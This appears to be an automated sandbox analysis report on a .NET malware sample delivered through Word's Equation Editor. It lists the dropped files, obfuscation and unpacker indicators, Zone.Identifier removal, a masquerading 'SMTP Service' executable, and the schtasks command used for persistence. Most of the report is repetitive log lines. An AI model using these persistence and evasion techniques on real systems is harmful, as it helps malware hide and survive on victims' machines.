Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: symbols\dll\System.pdb source: cat464923.exe, 00000005.00000002.2352627093.00000000060EC000.00000004.00000001.sdmp
Source:	Binary string: j,C:\Windows\System.pdb@#P source: cat464923.exe, 00000005.00000002.2352627093.00000000060EC000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\Client\Temp\geNROzYNTy\src\obj\Debug\grlL.pdb source: smtpsvc.exe
Source:	Binary string: .pdbD source: cat464923.exe, 00000005.00000002.2352627093.00000000060EC000.00000004.00000001.sdmp
Source:	Binary string: grlL.pdb0 source: cat464923.exe, 00000005.00000002.2347577380.000000000055D000.00000004.00000020.sdmp

Data Obfuscation:

.NET source code contains method to dynamically call methods (often used by packers)

Show sources

Source: catx[1].exe.2.dr, Form1.cs	.Net Code: LateBinding.LateCall(V_1, null, "Invoke", new object[] { 0, V_0 }, null, null)
Source: 4.2.cat464923.exe.8d0000.0.unpack, Form1.cs	.Net Code: LateBinding.LateCall(V_1, null, "Invoke", new object[] { 0, V_0 }, null, null)
Source: 4.0.cat464923.exe.8d0000.0.unpack, Form1.cs	.Net Code: LateBinding.LateCall(V_1, null, "Invoke", new object[] { 0, V_0 }, null, null)
Source: smtpsvc.exe.5.dr, Form1.cs	.Net Code: LateBinding.LateCall(V_1, null, "Invoke", new object[] { 0, V_0 }, null, null)
Source: 5.0.cat464923.exe.8d0000.2.unpack, Form1.cs	.Net Code: LateBinding.LateCall(V_1, null, "Invoke", new object[] { 0, V_0 }, null, null)
Source: 5.0.cat464923.exe.8d0000.4.unpack, Form1.cs	.Net Code: LateBinding.LateCall(V_1, null, "Invoke", new object[] { 0, V_0 }, null, null)
Source: 5.0.cat464923.exe.8d0000.0.unpack, Form1.cs	.Net Code: LateBinding.LateCall(V_1, null, "Invoke", new object[] { 0, V_0 }, null, null)
Source: 5.2.cat464923.exe.8d0000.6.unpack, Form1.cs	.Net Code: LateBinding.LateCall(V_1, null, "Invoke", new object[] { 0, V_0 }, null, null)

.NET source code contains potential unpacker

Show sources

Source: catx[1].exe.2.dr, Form1.cs	.Net Code: I_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.cat464923.exe.8d0000.0.unpack, Form1.cs	.Net Code: I_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.cat464923.exe.8d0000.0.unpack, Form1.cs	.Net Code: I_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: smtpsvc.exe.5.dr, Form1.cs	.Net Code: I_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.cat464923.exe.8d0000.2.unpack, Form1.cs	.Net Code: I_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.cat464923.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.cat464923.exe.400000.1.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.cat464923.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.cat464923.exe.400000.1.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.cat464923.exe.8d0000.4.unpack, Form1.cs	.Net Code: I_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.cat464923.exe.8d0000.0.unpack, Form1.cs	.Net Code: I_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.cat464923.exe.8d0000.6.unpack, Form1.cs	.Net Code: I_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 5_2_002DC400 push esp; iretd
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 5_2_002DC658 pushfd ; iretd
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Code function: 5_2_006B4459 push 00000000h; iretd
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_0059C688 push edx; retn 0059h
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 13_2_002BC688 push edx; retn 002Bh

Source: initial sample	Static PE information: section name: .text entropy: 7.60711640242
Source: initial sample	Static PE information: section name: .text entropy: 7.60711640242

Source: 5.2.cat464923.exe.400000.1.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 5.2.cat464923.exe.400000.1.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 5.0.cat464923.exe.400000.1.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 5.0.cat464923.exe.400000.1.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='

Source: C:\Users\user\AppData\Roaming\cat464923.exe	File created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\catx[1].exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\cat464923.exe	Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Users\user\AppData\Roaming\cat464923.exe

Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp60E5.tmp'

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\AppData\Roaming\cat464923.exe

File opened: C:\Users\user\AppData\Roaming\cat464923.exe:Zone.Identifier read attributes | delete

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
